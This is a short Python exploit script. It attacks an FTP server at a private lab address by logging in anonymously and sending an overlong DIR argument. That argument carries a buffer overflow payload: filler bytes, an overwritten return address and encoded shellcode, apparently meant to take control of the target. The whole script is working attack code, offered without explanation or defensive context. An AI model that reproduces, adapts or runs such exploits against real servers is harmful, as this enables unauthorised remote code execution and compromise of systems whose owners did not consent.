#!/usr/bin/python

import socket
import sys
import struct

ip = '10.0.2.6'
port = 21

s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((ip,port))

shellcode = ("\xba\x99\x29\x52\x18\xda\xc2\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x31\x56\x12\x83\xc6\x04\x03\xcf\x27\xb0\xed\x13\xdf\xb6"
"\x0e\xeb\x20\xd7\x87\x0e\x11\xd7\xfc\x5b\x02\xe7\x77\x09\xaf"
"\x8c\xda\xb9\x24\xe0\xf2\xce\x8d\x4f\x25\xe1\x0e\xe3\x15\x60"
"\x8d\xfe\x49\x42\xac\x30\x9c\x83\xe9\x2d\x6d\xd1\xa2\x3a\xc0"
"\xc5\xc7\x77\xd9\x6e\x9b\x96\x59\x93\x6c\x98\x48\x02\xe6\xc3"
"\x4a\xa5\x2b\x78\xc3\xbd\x28\x45\x9d\x36\x9a\x31\x1c\x9e\xd2"
"\xba\xb3\xdf\xda\x48\xcd\x18\xdc\xb2\xb8\x50\x1e\x4e\xbb\xa7"
"\x5c\x94\x4e\x33\xc6\x5f\xe8\x9f\xf6\x8c\x6f\x54\xf4\x79\xfb"
"\x32\x19\x7f\x28\x49\x25\xf4\xcf\x9d\xaf\x4e\xf4\x39\xeb\x15"
"\x95\x18\x51\xfb\xaa\x7a\x3a\xa4\x0e\xf1\xd7\xb1\x22\x58\xb0"
"\x76\x0f\x62\x40\x11\x18\x11\x72\xbe\xb2\xbd\x3e\x37\x1d\x3a"
"\x40\x62\xd9\xd4\xbf\x8d\x1a\xfd\x7b\xd9\x4a\x95\xaa\x62\x01"
"\x65\x52\xb7\x86\x35\xfc\x68\x67\xe5\xbc\xd8\x0f\xef\x32\x06"
"\x2f\x10\x99\x2f\xda\xeb\x4a\x5a\x1b\xf1\x8f\x32\x19\xf5\x8e"
"\x79\x94\x13\xfa\x6d\xf1\x8c\x93\x14\x58\x46\x05\xd8\x76\x23"
"\x05\x52\x75\xd4\xc8\x93\xf0\xc6\xbd\x53\x4f\xb4\x68\x6b\x65"
"\xd0\xf7\xfe\xe2\x20\x71\xe3\xbc\x77\xd6\xd5\xb4\x1d\xca\x4c"
"\x6f\x03\x17\x08\x48\x87\xcc\xe9\x57\x06\x80\x56\x7c\x18\x5c"
"\x56\x38\x4c\x30\x01\x96\x3a\xf6\xfb\x58\x94\xa0\x50\x33\x70"
"\x34\x9b\x84\x06\x39\xf6\x72\xe6\x88\xaf\xc2\x19\x24\x38\xc3"
"\x62\x58\xd8\x2c\xb9\xd8\xe8\x66\xe3\x49\x61\x2f\x76\xc8\xec"
"\xd0\xad\x0f\x09\x53\x47\xf0\xee\x4b\x22\xf5\xab\xcb\xdf\x87"
"\xa4\xb9\xdf\x34\xc4\xeb")

eip = struct.pack('<I',0x7cbd41fb)

nopsled = "\x90" * 8

payload = "A" * 247 + eip + "C" * 8 + shellcode + "D" * (1000-247-4-8-len(shellcode))

s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('DIR ' + payload + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close